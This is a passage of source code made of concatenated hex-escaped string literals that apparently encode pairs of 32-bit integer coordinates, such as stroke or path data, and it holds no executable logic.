"\x01\x00\x00\x4f\xff\xff\xff\x3b\x01\x00\x00\x50\xff\xff\xff\x39".
"\x01\x00\x00\x55\xff\xff\xff\x36\x01\x00\x00\x67\xff\xff\xff\x2e".
"\x01\x00\x00\x7b\xff\xff\xff\x28\x01\x00\x00\x99\xff\xff\xff\x25".
"\x01\x00\x00\xb5\xff\xff\xff\x25\x01\x00\x00\xd2\xff\xff\xff\x25".
"\x01\x00\x00\xe3\xff\xff\xff\x25\x01\x00\x00\xf1\xff\xff\xff\x25".
"\x01\x00\x00\xf4\xff\xff\xff\x26\x01\x00\x00\xf4\xff\xff\xff\x27".
"\x01\x00\x00\xf5\xff\xff\xff\x27\x01\x00\x00\xf6\xff\xff\xff\x28".
"\x01\x00\x00\xf6\xff\xff\xff\x29\x01\x00\x00\xf5\xff\xff\xff\x2a".
"\x01\x00\x00\xf3\xff\xff\xff\x2c\x01\x00\x00\xef\xff\xff\xff\x2e".
"\x01\x00\x00\xdc\xff\xff\xff\x35\x01\x00\x00\xc7\xff\xff\xff\x3f".
"\x01\x00\x00\xb3\xff\xff\xff\x45\x01\x00\x00\xa1\xff\xff\xff\x47".
"\x01\x00\x00\x8f\xff\xff\xff\x47\x01\x00\x00\x85\xff\xff\xff\x47".
"\x01\x00\x00\x81\xff\xff\xff\x47\x01\x00\x00\x7f\xff\xff\xff\x46".
"\x01\x00\x00\x7f\xff\xff\xff\x45\x01\x00\x00\x7e\xff\xff\xff\x44".
"\x01\x00\x00\x7e\xff\xff\xff\x43\x01\x00\x00\x7e\xff\xff\xff\x42".
"\x01\x00\x00\x7f\xff\xff\xff\x42\x01\x00\x00\x0c\xff\xff\xff\xd9".
"\x01\x00\x00\x0d\xff\xff\xff\xd9\x01\x00\x00\x0c\xff\xff\xff\xd8".
"\x01\x00\x00\x0d\xff\xff\xff\xd7\x01\x00\x00\x0e\xff\xff\xff\xd5".
"\x01\x00\x00\x10\xff\xff\xff\xd4\x01\x00\x00\x12\xff\xff\xff\xd1".
"\x01\x00\x00\x14\xff\xff\xff\xd0\x01\x00\x00\x16\xff\xff\xff\xcd".
"\x01\x00\x00\x17\xff\xff\xff\xcd\x01\x00\x00\x18\xff\xff\xff\xcb".
"\x01\x00\x00\x1b\xff\xff\xff\xc9\x01\x00\x00\xcc\xff\xff\xff\xaf".
"\x01\x00\x00\xcd\xff\xff\xff\xaf\x01\x00\x00\xd7\xff\xff\xff\xb3".
"\x01\x00\x00\xda\xff\xff\xff\xb4\x01\x00\x00\xe7\xff\xff\xff\xb7".
"\x01\x00\x00\xf3\xff\xff\xff\xba\x01\x00\x00\xfe\xff\xff\xff\xba".
"\x01\x00\x00\x0a\x00\x00\x00\xba\x01\x00\x00\x14\x00\x00\x00\xba".
"\x01\x00\x00\x17\x00\x00\x00\xba\x01\x00\x00\x1b\x00\x00\x00\xba".
"\x01\x00\x00\x1e\x00\x00\x00\xba\x01\x00\x00\x21\x00\x00\x00\xb9".
"\x01\x00\x00\x24\x00\x00\x00\xb9\x01\x00\x00\x26\x00\x00\x00\xb9".
"\x01\x00\x00\x30\x00\x00\x00\xb7\x01\x00\x00\x3c\x00\x00\x00\xb4".
"\x01\x00\x00\x49\x00\x00\x00\xb1\x01\x00\x00\x5b\x00\x00\x00\xaf".
"\x01\x00\x00\x69\x00\x00\x00\xaf\x01\x00\x00\x7a\x00\x00\x00\xad".
"\x01\x00\x00\x89\x00\x00\x00\xab\x01\x00\x00\x9a\x00\x00\x00\xab".
"\x01\x00\x00\xa7\x00\x00\x00\xab\x01\x00\x00\xb5\x00\x00\x00\xab".
"\x01\x00\x00\xc3\x00\x00\x00\xab\x01\x00\x00\xd1\x00\x00\x00\xab".
"\x01\x00\x00\xde\x00\x00\x00\xa9\x01\x00\x00\xed\x00\x00\x00\xa7".
"\x01\x00\x00\xfa\x00\x00\x00\xa7\x01\x00\x00\x08\x01\x00\x00\xa5".
"\x01\x00\x00\x17\x01\x00\x00\xa3\x01\x00\x00\x2c\x01\x00\x00\x9e".
"\x01\x00\x00\x45\x01\x00\x00\x97\x01\x00\x00\x61\x01\x00\x00\x8a".
"\x01\x00\x00\x84\x01\x00\x00\x86\x01\x00\x00\x9c\x01\x00\x00\x82".
"\x01\x00\x00\xab\x01\x00\x00\x7e\x01\x00\x00\xb6\x01\x00\x00\x7e".
"\x01\x00\x00\xb9\x01\x00\x00\x7e\x01\x00\x00\xba\x01\x00\x00\x7d".
"\x01\x00\x00\xbc\x01\x00\x00\x7d\x01\x00\x00\xbb\x01\x00\x00\x7d".
"\x01\x00\x00\xba\x01\x00\x00\x7d\x01\x00\x00\xb8\x01\x00\x00\x7c".
"\x01\x00\x00\xac\x01\x00\x00\x78\x01\x00\x00\x8c\x01\x00\x00\x6e".
"\x01\x00\x00\x63\x01\x00\x00\x62\x01\x00\x00\x39\x01\x00\x00\x5b".
"\x01\x00\x00\x0a\x01\x00\x00\x53\x01\x00\x00\xc4\x00\x00\x00\x46".
"\x01\x00\x00\x85\x00\x00\x00\x3a\x01\x00\x00\x4a\x00\x00\x00\x2d".
"\x01\x00\x00\x05\x00\x00\x00\x20\x01\x00\x00\xc5\xff\xff\xff\x17".
"\x01\x00\x00\x90\xff\xff\xff\x0b\x01\x00\x00\x66\xff\xff\xff\x03".
"\x01\x00\x00\x43\xff\xff\xff\xfc\x00\x00\x00\x2b\xff\xff\xff\xf9".
"\x00\x00\x00\x11\xff\xff\xff\xf0\x00\x00\x00\xfb\xfe\xff\xff\xe6".
"\x00\x00\x00\xe1\xfe\xff\xff\xdd\x00\x00\x00\xcc\xfe\xff\xff\xd3".
"\x00\x00\x00\xb0\xfe\xff\xff\xc2\x00\x00\x00\x9e\xfe\xff\xff\xb3".
"\x00\x00\x00\x8d\xfe\xff\xff\xa8\x00\x00\x00\x89\xfe\xff\xff\xa4".
"\x00\x00\x00\x85\xfe\xff\xff\xa1\x00\x00\x00\x83\xfe\xff\xff\x9f".
"\x00\x00\x00\x82\xfe\xff\xff\x9e\x00\x00\x00\x82\xfe\xff\xff\x9d".
"\x00\x00\x00\x81\xfe\xff\xff\x9d\x00\x00\x00\x81\xfe\xff\xff\x9c".
"\x00\x00\x00\x81\xfe\xff\xff\x9b\x00\x00\x00\x82\xfe\xff\xff\x9b".
"\x00\x00\x00\x83\xfe\xff\xff\x9b\x00\x00\x00\x85\xfe\xff\xff\x9c".
"\x00\x00\x00\x87\xfe\xff\xff\x9e\x00\x00\x00\x88\xfe\xff\xff\x9e".
"\x00\x00\x00\x8c\xfe\xff\xff\xa1\x00\x00\x00\x8d\xfe\xff\xff\xa5".
"\x00\x00\x00\x8d\xfe\xff\xff\xb0\x00\x00\x00\x91\xfe\xff\xff\xbe".
"\x00\x00\x00\x93\xfe\xff\xff\xcc\x00\x00\x00\x93\xfe\xff\xff\xda".
"\x00\x00\x00\x93\xfe\xff\xff\xe7\x00\x00\x00\x90\xfe\xff\xff\xf6".
"\x00\x00\x00\x8e\xfe\xff\xff\x08\x01\x00\x00\x8c\xfe\xff\xff\x15".
"\x01\x00\x00\x8c\xfe\xff\xff\x23\x01\x00\x00\x8f\xfe\xff\xff\x31".
"\x01\x00\x00\x99\xfe\xff\xff\x3e\x01\x00\x00\x9b\xfe\xff\xff\x41".
"\x01\x00\x00\xa5\xfe\xff\xff\x4d\x01\x00\x00\xb1\xfe\xff\xff\x57".
"\x01\x00\x00\xc3\xfe\xff\xff\x62\x01\x00\x00\xd7\xfe\xff\xff\x68".
"\x01\x00\x00\xfa\xfe\xff\xff\x70\x01\x00\x00\x1e\xff\xff\xff\x77".
"\x01\x00\x00\x4b\xff\xff\xff\x77\x01\x00\x00\x7e\xff\xff\xff\x77".
"\x01\x00\x00\xb2\xff\xff\xff\x70\x01\x00\x00\xe6\xff\xff\xff\x67".
"\x01\x00\x00\x10\x00\x00\x00\x60\x01\x00\x00\x2f\x00\x00\x00\x56".
"\x01\x00\x00\x45\x00\x00\x00\x4c\x01\x00\x00\x51\x00\x00\x00\x48".
"\x01\x00\x00\x53\x00\x00\x00\x47\x01\x00\x00\x54\x00\x00\x00\x45".
"\x01\x00\x00\x56\x00\x00\x00\x45\x01\x00\x00\x57\x00\x00\x00\x43".
"\x01\x00\x00\x58\x00\x00\x00\x41\x01\x00\x00\x59\x00\x00\x00\x3f".
"\x01\x00\x00\x5a\x00\x00\x00\x3c\x01\x00\x00\x5f\x00\x00\x00\x30".
"\x01\x00\x00\x61\x00\x00\x00\x25\x01\x00\x00\x63\x00\x00\x00\x19".
"\x01\x00\x00\x60\x00\x00\x00\x0c\x01\x00\x00\x5f\x00\x00\x00\x09".
"\x01\x00\x00\x5d\x00\x00\x00\xfd\x00\x00\x00\x57\x00\x00\x00\xf2".
"\x00\x00\x00\x55\x00\x00\x00\xee\x00\x00\x00\x51\x00\x00\x00\xea".
"\x00\x00\x00\x47\x00\x00\x00\xde\x00\x00\x00\x44\x00\x00\x00\xdd".
"\x00\x00\x00\x42\x00\x00\x00\xdc\x00\x00\x00\x3f\x00\x00\x00\xdc".
"\x00\x00\x00\x3c\x00\x00\x00\xdc\x00\x00\x00\x2f\x00\x00\x00\xe1".
"\x00\x00\x00\x1e\x00\x00\x00\xeb\x00\x00\x00\x10\x00\x00\x00\xf9".
"\x00\x00\x00\xfe\xff\xff\xff\x09\x01\x00\x00\xe9\xff\xff\xff\x15".
"\x01\x00\x00\xd0\xff\xff\xff\x2d\x01\x00\x00\xb8\xff\xff\xff\x46".
"\x01\x00\x00\xa7\xff\xff\xff\x5d\x01\x00\x00\x98\xff\xff\xff\x6f".
"\x01\x00\x00\x88\xff\xff\xff\x86\x01\x00\x00\x7f\xff\xff\xff\x96".
"\x01\x00\x00\x7a\xff\xff\xff\xa5\x01\x00\x00\x76\xff\xff\xff\xb0".
"\x01\x00\x00\x75\xff\xff\xff\xb3\x01\x00\x00\x75\xff\xff\xff\xb6".
"\x01\x00\x00\x75\xff\xff\xff\xb9\x01\x00\x00\x76\xff\xff\xff\xbc".
"\x01\x00\x00\x78\xff\xff\xff\xbe\x01\x00\x00\x7b\xff\xff\xff\xc0".
"\x01\x00\x00\x7d\xff\xff\xff\xc2\x01\x00\x00\x87\xff\xff\xff\xc5".
"\x01\x00\x00\x92\xff\xff\xff\xc8\x01\x00\x00\xa8\xff\xff\xff\xca".
"\x01\x00\x00\xbf\xff\xff\xff\xca\x01\x00\x00\xdb\xff\xff\xff\xca".
"\x01\x00\x00\x05\x00\x00\x00\xc3\x01\x00\x00\x29\x00\x00\x00\xbc".
"\x01\x00\x00\x4f\x00\x00\x00\xad\x01\x00\x00\x75\x00\x00\x00\x99".
"\x01\x00\x00\x95\x00\x00\x00\x88\x01\x00\x00\xb7\x00\x00\x00\x75".
"\x01\x00\x00\xce\x00\x00\x00\x64\x01\x00\x00\xe0\x00\x00\x00\x56".
"\x01\x00\x00\xec\x00\x00\x00\x44\x01\x00\x00\xf2\x00\x00\x00\x39".
"\x01\x00\x00\xf9\x00\x00\x00\x2d\x01\x00\x00\xff\x00\x00\x00\x1b".
"\x01\x00\x00\x03\x01\x00\x00\x0f\x01\x00\x00\x06\x01\x00\x00\xfe".
"\x00\x00\x00\x08\x01\x00\x00\xf3\x00\x00\x00\x0a\x01\x00\x00\xe4".
"\x00\x00\x00\x0a\x01\x00\x00\xd3\x00\x00\x00\x0a\x01\x00\x00\xc6".
"\x00\x00\x00\x07\x01\x00\x00\xb8\x00\x00\x00\x00\x01\x00\x00\xa9".
"\x00\x00\x00\xf7\x00\x00\x00\x99\x00\x00\x00\xee\x00\x00\x00\x8d".
"\x00\x00\x00\xe0\x00\x00\x00\x7f\x00\x00\x00\xd5\x00\x00\x00\x78".
"\x00\x00\x00\xc5\x00\x00\x00\x6d\x00\x00\x00\xab\x00\x00\x00\x64".
"\x00\x00\x00\x94\x00\x00\x00\x64\x00\x00\x00\x83\x00\x00\x00\x64".
"\x00\x00\x00\x66\x00\x00\x00\x68\x00\x00\x00\x4a\x00\x00\x00\x76".
"\x00\x00\x00\x2a\x00\x00\x00\x84\x00\x00\x00\x0c\x00\x00\x00\x9d".
"\x00\x00\x00\xe4\xff\xff\xff\xb9\x00\x00\x00\xc1\xff\xff\xff\xdd".
"\x00\x00\x00\x9e\xff\xff\xff\x01\x01\x00\x00\x7d\xff\xff\xff\x29".
"\x01\x00\x00\x5d\xff\xff\xff\x52\x01\x00\x00\x38\xff\xff\xff\x7a".
"\x01\x00\x00\x1c\xff\xff\xff\xa2\x01\x00\x00\x04\xff\xff\xff\xc9".
"\x01\x00\x00\xf3\xfe\xff\xff\xea\x01\x00\x00\xe4\xfe\xff\xff\x0b".
"\x02\x00\x00\xda\xfe\xff\xff\x25\x02\x00\x00\xd0\xfe\xff\xff\x3f".
"\x02\x00\x00\xce\xfe\xff\xff\x4d\x02\x00\x00\xce\xfe\xff\xff\x5b".
"\x02\x00\x00\xcb\xfe\xff\xff\x66\x02\x00\x00\xcb\xfe\xff\xff\x71".
"\x02\x00\x00\xcf\xfe\xff\xff\x7d\x02\x00\x00\xd2\xfe\xff\xff\x81".
"\x02\x00\x00\xdc\xfe\xff\xff\x8c\x02\x00\x00\xe8\xfe\xff\xff\x96".
"\x02\x00\x00\xf4\xfe\xff\xff\x9d\x02\x00\x00\x0b\xff\xff\xff\xa5".
"\x02\x00\x00\x24\xff\xff\xff\xac\x02\x00\x00\x47\xff\xff\xff\xb0".
"\x02\x00\x00\x9c\xff\xff\xff\xb3\x02\x00\x00\xc9\xff\xff\xff\xb3".
"\x02\x00\x00\xf7\xff\xff\xff\xb3\x02\x00\x00\x2c\x00\x00\x00\xa7".
"\x02\x00\x00\x5b\x00\x00\x00\x9f\x02\x00\x00\x89\x00\x00\x00\x98".
"\x02\x00\x00\xb9\x00\x00\x00\x8b\x02\x00\x00\xdc\x00\x00\x00\x88".
"\x02\x00\x00\x00\x01\x00\x00\x81\x02\x00\x00\x3c\x01\x00\x00\x76".
"\x02\x00\x00\x5a\x01\x00\x00\x70\x02\x00\x00\x76\x01\x00\x00\x62".
"\x02\x00\x00\x92\x01\x00\x00\x55\x02\x00\x00\xac\x01\x00\x00\x4b".
"\x02\x00\x00\xc2\x01\x00\x00\x3b\x02\x00\x00\xd9\x01\x00\x00\x2a".
"\x02\x00\x00\xf9\x01\x00\x00\x0e\x02\x00\x00\x03\x02\x00\x00\x02".
"\x02\x00\x00\x0c\x02\x00\x00\xf5\x01\x00\x00\x0f\x02\x00\x00\xe8".
"\x01\x00\x00\x14\x02\x00\x00\xdc\x01\x00\x00\x14\x02\x00\x00\xd1".
"\x01\x00\x00\x16\x02\x00\x00\xc3\x01\x00\x00\x16\x02\x00\x00\xb1".
"\x01\x00\x00\x16\x02\x00\x00\xa1\x01\x00\x00\x13\x02\x00\x00\x8e".
"\x01\x00\x00\x10\x02\x00\x00\x71\x01\x00\x00\x04\x02\x00\x00\x46".
"\x01\x00\x00\xf6\x01\x00\x00\x26\x01\x00\x00\xde\x01\x00\x00\xfe".
"\x00\x00\x00\xcb\x01\x00\x00\xd9\x00\x00\x00\xa0\x01\x00\x00\x9e".
"\x00\x00\x00\x8a\x01\x00\x00\x82\x00\x00\x00\x75\x01\x00\x00\x6a".
"\x00\x00\x00\x5e\x01\x00\x00\x5a\x00\x00\x00\x4e\x01\x00\x00\x4e".
"\x00\x00\x00\x37\x01\x00\x00\x3d\x00\x00\x00\x23\x01\x00\x00\x38".
"\x00\x00\x00\x09\x01\x00\x00\x32\x00\x00\x00\xf2\x00\x00\x00\x32".
"\x00\x00\x00\xd1\x00\x00\x00\x32\x00\x00\x00\xad\x00\x00\x00\x36".
"\x00\x00\x00\x8c\x00\x00\x00\x49\x00\x00\x00\x67\x00\x00\x00\x58".
"\x00\x00\x00\x41\x00\x00\x00\x66\x00\x00\x00\xff\xff\xff\xff\x87".
"\x00\x00\x00\xe3\xff\xff\xff\x9d\x00\x00\x00\xc7\xff\xff\xff\xab".
"\x00\x00\x00\xb0\xff\xff\xff\xba\x00\x00\x00\x99\xff\xff\xff\xcf".
"\x00\x00\x00\x88\xff\xff\xff\xdb\x00\x00\x00\x7b\xff\xff\xff\xe4".
"\x00\x00\x00\x72\xff\xff\xff\xf1\x00\x00\x00\x6e\xff\xff\xff\xf5".
"\x00\x00\x00\x67\xff\xff\xff\x00\x01\x00\x00\x60\xff\xff\xff\x0c".
"\x01\x00\x00\x5e\xff\xff\xff\x17\x01\x00\x00\x5e\xff\xff\xff\x1a".
"\x01\x00\x00\x5e\xff\xff\xff\x24\x01\x00\x00\x5e\xff\xff\xff\x2f".
"\x01\x00\x00\x62\xff\xff\xff\x3e\x01\x00\x00\x68\xff\xff\xff\x57".
"\x01\x00\x00\x7a\xff\xff\xff\x73\x01\x00\x00\x8b\xff\xff\xff\x8a".
"\x01\x00\x00\x9c\xff\xff\xff\xa6\x01\x00\x00\xb4\xff\xff\xff\xbf".
"\x01\x00\x00\xcd\xff\xff\xff\xd7\x01\x00\x00\xeb\xff\xff\xff\xf1".
"\x01\x00\x00\x07\x00\x00\x00\x03\x02\x00\x00\x28\x00\x00\x00\x18".
"\x02\x00\x00\x4f\x00\x00\x00\x28\x02\x00\x00\x6e\x00\x00\x00\x33".
"\x02\x00\x00\x8d\x00\x00\x00\x3d\x02\x00\x00\xaa\x00\x00\x00\x40".
"\x02\x00\x00\xc7\x00\x00\x00\x40\x02\x00\x00\xde\x00\x00\x00\x40".
"\x02\x00\x00\xf0\x00\x00\x00\x3e\x02\x00\x00\x05\x01\x00\x00\x38".
"\x02\x00\x00\x10\x01\x00\x00\x32\x02\x00\x00\x12\x01\x00\x00\x2e".
"\x02\x00\x00\x16\x01\x00\x00\x2b\x02\x00\x00\x17\x01\x00\x00\x29".
"\x02\x00\x00\x19\x01\x00\x00\x26\x02\x00\x00\x19\x01\x00\x00\x17".
"\x02\x00\x00\x19\x01\x00\x00\xfc\x01\x00\x00\x12\x01\x00\x00\xe8".
"\x01\x00\x00\x09\x01\x00\x00\xd3\x01\x00\x00\x01\x01\x00\x00\xbe".
"\x01\x00\x00\xf3\x00\x00\x00\xa3\x01\x00\x00\xe8\x00\x00\x00\x91".
"\x01\x00\x00\xd5\x00\x00\x00\x7e\x01\x00\x00\xc1\x00\x00\x00\x6c".
"\x01\x00\x00\xaa\x00\x00\x00\x5b\x01\x00\x00\x93\x00\x00\x00\x4b".
"\x01\x00\x00\x5f\x00\x00\x00\x36\x01\x00\x00\x3b\x00\x00\x00\x30".
"\x01\x00\x00\x18\x00\x00\x00\x2c\x01\x00\x00\xf6\xff\xff\xff\x2c".
"\x01\x00\x00\xce\xff\xff\xff\x2c\x01\x00\x00\xac\xff\xff\xff\x30".
"\x01\x00\x00\x81\xff\xff\xff\x3c\x01\x00\x00\x5c\xff\xff\xff\x4a".
"\x01\x00\x00\x3c\xff\xff\xff\x59\x01\x00\x00\x1b\xff\xff\xff\x67".
"\x01\x00\x00\x00\xff\xff\xff\x75\x01\x00\x00\xe9\xfe\xff\xff\x81".
"\x01\x00\x00\xd9\xfe\xff\xff\x8d\x01\x00\x00\xc7\xfe\xff\xff\x9d".
"\x01\x00\x00\xb5\xfe\xff\xff\xa7\x01\x00\x00\xb2\xfe\xff\xff\xaa".
"\x01\x00\x00\xaf\xfe\xff\xff\xae\x01\x00\x00\xae\xfe\xff\xff\xaf".
"\x01\x00\x00\xae\xfe\xff\xff\xb1\x01\x00\x00\xae\xfe\xff\xff\xb4".
"\x01\x00\x00\xae\xfe\xff\xff\xb8\x01\x00\x00\xb0\xfe\xff\xff\xbb".
"\x01\x00\x00\xb2\xfe\xff\xff\xbf\x01\x00\x00\xb9\xfe\xff\xff\xcd".
"\x01\x00\x00\xbe\xfe\xff\xff\xd9\x01\x00\x00\xc2\xfe\xff\xff\xdd".
"\x01\x00\x00\xd9\xfe\xff\xff\xf6\x01\x00\x00\xf0\xfe\xff\xff\x07".
"\x02\x00\x00\x0a\xff\xff\xff\x11\x02\x00\x00\x24\xff\xff\xff\x1b".
"\x02\x00\x00\x42\xff\xff\xff\x1e\x02\x00\x00\x5e\xff\xff\xff\x1e".
"\x02\x00\x00\x7f\xff\xff\xff\x1e\x02\x00\x00\xa2\xff\xff\xff\x1e".
"\x02\x00\x00\xc0\xff\xff\xff\x17\x02\x00\x00\xe4\xff\xff\xff\x10".
"\x02\x00\x00\x04\x00\x00\x00\x06\x02\x00\x00\x35\x00\x00\x00\xef".
"\x01\x00\x00\x44\x00\x00\x00\xe8\x01\x00\x00\x52\x00\x00\x00\xda".
"\x01\x00\x00\x5d\x00\x00\x00\xd0\x01\x00\x00\x61\x00\x00\x00\xcc".
"\x01\x00\x00\x69\x00\x00\x00\xc1\x01\x00\x00\x74\x00\x00\x00\xad".
"\x01\x00\x00\x78\x00\x00\x00\x9f\x01\x00\x00\x7d\x00\x00\x00\x90".
"\x01\x00\x00\x83\x00\x00\x00\x80\x01\x00\x00\x85\x00\x00\x00\x6e".
"\x01\x00\x00\x85\x00\x00\x00\x60\x01\x00\x00\x85\x00\x00\x00\x4f".
"\x01\x00\x00\x82\x00\x00\x00\x42\x01\x00\x00\x7d\x00\x00\x00\x33".
"\x01\x00\x00\x78\x00\x00\x00\x28\x01\x00\x00\x74\x00\x00\x00\x1c".
"\x01\x00\x00\x6d\x00\x00\x00\x11\x01\x00\x00\x6a\x00\x00\x00\x0d".
"\x01\x00\x00\x5c\x00\x00\x00\x00\x01\x00\x00\x4d\x00\x00\x00\xf8".
"\x00\x00\x00\x3e\x00\x00\x00\xf3\x00\x00\x00\x2b\x00\x00\x00\xf1".
"\x00\x00\x00\x19\x00\x00\x00\xf1\x00\x00\x00\x02\x00\x00\x00\xf4".
"\x00\x00\x00\xe6\xff\xff\xff\x01\x01\x00\x00\xc7\xff\xff\xff\x0d".
"\x01\x00\x00\xa6\xff\xff\xff\x1e\x01\x00\x00\x7f\xff\xff\xff\x36".
"\x01\x00\x00\x67\xff\xff\xff\x4a\x01\x00\x00\x4a\xff\xff\xff\x64".
"\x01\x00\x00\x35\xff\xff\xff\x7c\x01\x00\x00\x23\xff\xff\xff\x8f".
"\x01\x00\x00\x13\xff\xff\xff\xa1\x01\x00\x00\x0a\xff\xff\xff\xad".
"\x01\x00\x00\xff\xfe\xff\xff\xba\x01\x00\x00\xf9\xfe\xff\xff\xc5".
"\x01\x00\x00\xf4\xfe\xff\xff\xd1\x01\x00\x00\xf2\xfe\xff\xff\xdc".
"\x01\x00\x00\xf1\xfe\xff\xff\xdf\x01\x00\x00\xf1\xfe\xff\xff\xe2".
"\x01\x00\x00\xf1\xfe\xff\xff\xe5\x01\x00\x00\xf1\xfe\xff\xff\xe9".
"\x01\x00\x00\xf2\xfe\xff\xff\xf3\x01\x00\x00\xf4\xfe\xff\xff\xf6".
"\x01\x00\x00\xf6\xfe\xff\xff\xf9\x01\x00\x00\xfc\xfe\xff\xff\x05".
"\x02\x00\x00\x0a\xff\xff\xff\x11\x02\x00\x00\x15\xff\xff\xff\x1c".
"\x02\x00\x00\x2b\xff\xff\xff\x28\x02\x00\x00\x46\xff\xff\xff\x32".
"\x02\x00\x00\x69\xff\xff\xff\x39\x02\x00\x00\x8d\xff\xff\xff\x3d".
"\x02\x00\x00\xae\xff\xff\xff\x3d\x02\x00\x00\xd6\xff\xff\xff\x3d".
"\x02\x00\x00\xfb\xff\xff\xff\x33\x02\x00\x00\x19\x00\x00\x00\x2b".
"\x02\x00\x00\x39\x00\x00\x00\x21\x02\x00\x00\x55\x00\x00\x00\x13".
"\x02\x00\x00\x6b\x00\x00\x00\x07\x02\x00\x00\x78\x00\x00\x00\xf9".
"\x01\x00\x00\x7b\x00\x00\x00\xf6\x01\x00\x00\x85\x00\x00\x00\xea".
"\x01\x00\x00\x87\x00\x00\x00\xe6\x01\x00\x00\x8b\x00\x00\x00\xdb".
"\x01\x00\x00\x90\x00\x00\x00\xd0\x01\x00\x00\x92\x00\x00\x00\xc1".
"\x01\x00\x00\x92\x00\x00\x00\xb3\x01\x00\x00\x92\x00\x00\x00\xa9".
"\x01\x00\x00\x92\x00\x00\x00\x97\x01\x00\x00\x8f\x00\x00\x00\x8a".
"\x01\x00\x00\x8b\x00\x00\x00\x7b\x01\x00\x00\x82\x00\x00\x00\x66".
"\x01\x00\x00\x78\x00\x00\x00\x5a\x01\x00\x00\x6e\x00\x00\x00\x4d".
"\x01\x00\x00\x6c\x00\x00\x00\x4a\x01\x00\x00\x54\x00\x00\x00\x3f".
"\x01\x00\x00\x48\x00\x00\x00\x3a\x01\x00\x00\x3b\x00\x00\x00\x3a".
"\x01\x00\x00\x22\x00\x00\x00\x3a\x01\x00\x00\xfc\xff\xff\xff\x45".
"\x01\x00\x00\xc7\xff\xff\xff\x5e\x01\x00\x00\xb0\xff\xff\xff\x6f".
"\x01\x00\x00\xa4\xff\xff\xff\x78\x01\x00\x00\x9c\xff\xff\xff\x7d".
"\x01\x00\x00\x9c\xff\xff\xff\x7f\x01\x00\x00\x9a\xff\xff\xff\x80".
"\x01\x00\x00\x9a\xff\xff\xff\x81\x01\x00\x00\x99\xff\xff\xff\x82".
"\x01\x00\x00\x99\xff\xff\xff\x84\x01\x00\x00\x99\xff\xff\xff\x85".
"\x01\x00\x00\x99\xff\xff\xff\x86\x01\x00\x00\x9a\xff\xff\xff\x87".
"\x01\x00\x00\x9e\xff\xff\xff\x8b\x01\x00\x00\xa9\xff\xff\xff\x8f".
"\x01\x00\x00\xbc\xff\xff\xff\x94\x01\x00\x00\xda\xff\xff\xff\x9b".
"\x01\x00\x00\x08\x00\x00\x00\x9f\x01\x00\x00\x30\x00\x00\x00\xa3".
"\x01\x00\x00\x5d\x00\x00\x00\xa3\x01\x00\x00\x85\x00\x00\x00\xa3".
"\x01\x00\x00\xa8\x00\x00\x00\xa0\x01\x00\x00\xda\x00\x00\x00\x97".
"\x01\x00\x00\xe8\x00\x00\x00\x94\x01\x00\x00\xf6\x00\x00\x00\x90".
"\x01\x00\x00\xf9\x00\x00\x00\x8e\x01\x00\x00\xfc\x00\x00\x00\x8d".
"\x01\x00\x00\xff\x00\x00\x00\x8b\x01\x00\x00\x01\x01\x00\x00\x89".
"\x01\x00\x00\x03\x01\x00\x00\x87\x01\x00\x00\x04\x01\x00\x00\x85".
"\x01\x00\x00\x05\x01\x00\x00\x82\x01\x00\x00\x05\x01\x00\x00\x80".
"\x01\x00\x00\x05\x01\x00\x00\x7d\x01\x00\x00\x04\x01\x00\x00\x7a".
"\x01\x00\x00\x02\x01\x00\x00\x77\x01\x00\x00\x01\x01\x00\x00\x75".
"\x01\x00\x00\x00\x01\x00\x00\x74\x01\x00\x00\xff\x00\x00\x00\x73".
"\x01\x00\x00\xfd\x00\x00\x00\x72\x01\x00\x00\xfa\x00\x00\x00\x71".
"\x01\x00\x00\xf7\x00\x00\x00\x71\x01\x00\x00\xf4\x00\x00\x00\x72".
"\x01\x00\x00\xe9\x00\x00\x00\x77\x01\x00\x00\xda\x00\x00\x00\x7b".
"\x01\x00\x00\xc4\x00\x00\x00\x88\x01\x00\x00\xae\x00\x00\x00\x95".
"\x01\x00\x00\x8b\x00\x00\x00\xaf\x01\x00\x00\x79\x00\x00\x00\xbe".
"\x01\x00\x00\x67\x00\x00\x00\xd2\x01\x00\x00\x53\x00\x00\x00\xe4".
"\x01\x00\x00\x4d\x00\x00\x00\xf0\x01\x00\x00\x38\x00\x00\x00\x0c".
"\x02\x00\x00\x34\x00\x00\x00\x17\x02\x00\x00\x2e\x00\x00\x00\x23".
"\x02\x00\x00\x2a\x00\x00\x00\x2e\x02\x00\x00\x29\x00\x00\x00\x32".
"\x02\x00\x00\x28\x00\x00\x00\x35\x02\x00\x00\x27\x00\x00\x00\x37".
"\x02\x00\x00\x25\x00\x00\x00\x3a\x02\x00\x00\x25\x00\x00\x00\x3c".
"\x02\x00\x00\x25\x00\x00\x00\x3d\x02\x00\x00\x25\x00\x00\x00\x3e".
"\x02\x00\x00\x25\x00\x00\x00\x3f\x02\x00\x00\x26\x00\x00\x00\x40".
"\x02\x00\x00\x2a\x00\x00\x00\x41\x02\x00\x00\x38\x00\x00\x00\x41".
"\x02\x00\x00\x55\x00\x00\x00\x3f\x02\x00\x00\x78\x00\x00\x00\x3b".
"\x02\x00\x00\x9f\x00\x00\x00\x28\x02\x00\x00\xc3\x00\x00\x00\x1d".
"\x02\x00\x00\xe4\x00\x00\x00\x0e\x02\x00\x00\xff\x00\x00\x00\x01".
"\x02\x00\x00\x15\x01\x00\x00\xf8\x01\x00\x00\x21\x01\x00\x00\xee".
"\x01\x00\x00\x24\x01\x00\x00\xec\x01\x00\x00\x25\x01\x00\x00\xe9".
"\x01\x00\x00\x27\x01\x00\x00\xe5\x01\x00\x00\x2a\x01\x00\x00\xe0".
"\x01\x00\x00\x2b\x01\x00\x00\xdd\x01\x00\x00\x2c\x01\x00\x00\xdb".
"\x01\x00\x00\x2f\x01\x00\x00\xd1\x01\x00\x00\x2f\x01\x00\x00\xcd".
"\x01\x00\x00\x2f\x01\x00\x00\xc4\x01\x00\x00\x2f\x01\x00\x00\xb9".
"\x01\x00\x00\x29\x01\x00\x00\xad\x01\x00\x00\x22\x01\x00\x00\x9e".
"\x01\x00\x00\x1d\x01\x00\x00\x92\x01\x00\x00\x1c\x01\x00\x00\x8f".
"\x01\x00\x00\x19\x01\x00\x00\x8d\x01\x00\x00\x17\x01\x00\x00\x8b".
"\x01\x00\x00\x11\x01\x00\x00\x87\x01\x00\x00\x0d\x01\x00\x00\x86".
"\x01\x00\x00\x03\x01\x00\x00\x86\x01\x00\x00\xf2\x00\x00\x00\x86".
"\x01\x00\x00\xdb\x00\x00\x00\x86\x01\x00\x00\xc8\x00\x00\x00\x89".
